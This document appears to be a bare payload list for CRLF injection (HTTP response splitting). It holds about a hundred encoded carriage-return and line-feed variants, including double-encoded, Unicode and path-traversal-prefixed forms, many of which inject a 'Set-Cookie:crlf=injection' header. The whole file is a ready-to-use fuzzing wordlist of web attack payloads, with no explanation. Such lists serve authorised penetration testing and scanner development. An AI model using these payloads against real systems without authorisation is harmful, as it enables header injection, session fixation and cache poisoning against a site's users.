%0d%0a
\r\n
%0d%0a%0d%0a
\r\n\r\n
%0D%0A
%0D%0A%0D%0A
%0d%0a%09
%0d%0a%20
%20%0d%0a
%23%0d%0a
%23%0a
%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%0D%0A
%3F%0d%0a
crlf%0A
crlf%0A%20
crlf%20%0A
crlf%23%0D%0A
crlf%23%0A
crlf%E5%98%8A%E5%98%8D
crlf%E5%98%8A%E5%98%8D%0D%0A
crlf%3F%0D%0A
%0D
%0D%20
%20%0D
%23%0D
%23%0A
%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%0D
%3F%0D
crlf%0D
crlf%0D%20
crlf%20%0D
crlf%23%0D
crlf%23%0A
crlf%E5%98%8A%E5%98%8D
crlf%E5%98%8A%E5%98%8D%0D
crlf%3F%0D
%0D%0A%09
crlf%0D%0A%09
%250A
%25250A
%%0A0A
%25%30A
%25%30%61
%u000A
//www.google.com/%2F%2E%2E%0D%0A
www.google.com/%2E%2E%2F%0D%0A
/google.com/%2F..%0D%0A
%0d%0a%0aSet-Cookie:crlf=injection
%0aSet-Cookie:crlf=injection
%0d%0aSet-Cookie:crlf=injection
%0dSet-Cookie:crlf=injection
%23%0aSet-Cookie:crlf=injection
%23%0d%0aSet-Cookie:crlf=injection
%23%0dSet-Cookie:crlf=injection
%25%30%61Set-Cookie:crlf=injection
%25%30aSet-Cookie:crlf=injection
%250aSet-Cookie:crlf=injection
%25250aSet-Cookie:crlf=injection
%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
%2F..%0d%0aSet-Cookie:crlf=injection
%3f%0d%0aSet-Cookie:crlf=injection
%3f%0dSet-Cookie:crlf=injection
%u000aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%252e%252e%252f%0d%0aSet-Cookie:crlf=injection
/%2F%2E%2E%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection
/.%0d%0aSet-Cookie:crlf=injection
/.%0ASet-Cookie:crlf=injection
/.%0DSet-Cookie:crlf=injection
/%2e%0d%0aSet-Cookie:crlf=injection
/%2e%0ASet-Cookie:crlf=injection
/%2e%0DSet-Cookie:crlf=injection
/%2f%2e%0d%0aSet-Cookie:crlf=injection
/%2F%2E%0d%0aSet-Cookie:crlf=injection
/%2F%2e%0ASet-Cookie:crlf=injection
/%2F%2e%0DSet-Cookie:crlf=injection
/%252f%252e%0d%0aSet-Cookie:crlf=injection
/%252F%252E%0d%0aSet-Cookie:crlf=injection
/%252f%252e%0ASet-Cookie:crlf=injection
/%252F%252e%0ASet-Cookie:crlf=injection
/%252f%252e%0DSet-Cookie:crlf=injection
/%252F%252e%0DSet-Cookie:crlf=injection
/%255c%255c%0d%0aSet-Cookie:crlf=injection
/%255c%255c%0ASet-Cookie:crlf=injection
/%255c%255c%0DSet-Cookie:crlf=injection
/%5c%5c%0d%0aSet-Cookie:crlf=injection
/%5c%5c%0ASet-Cookie:crlf=injection
/%5c%5c%0DSet-Cookie:crlf=injection
/%3f%0D%0ASet-Cookie:crlf=injection
/%u000d%0aSet-Cookie:crlf=injection
/%u000DSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
